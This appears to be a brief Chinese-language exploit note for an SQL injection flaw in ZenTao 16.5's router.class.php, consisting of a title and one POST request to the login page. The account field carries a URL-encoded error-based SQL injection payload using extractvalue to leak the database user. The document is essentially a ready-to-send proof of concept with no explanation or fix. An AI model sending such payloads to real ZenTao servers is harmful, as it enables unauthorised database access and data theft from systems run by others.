禅道16.5router.class.phpSQL注入漏洞

禅道 16.5 router.class.php SQL注入漏洞

POST /user-login.html 
account=admin%27+and+%28select+extractvalue%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%29%29%23